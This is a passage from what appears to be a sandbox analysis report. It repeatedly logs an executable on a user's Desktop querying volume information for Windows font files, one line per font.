                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
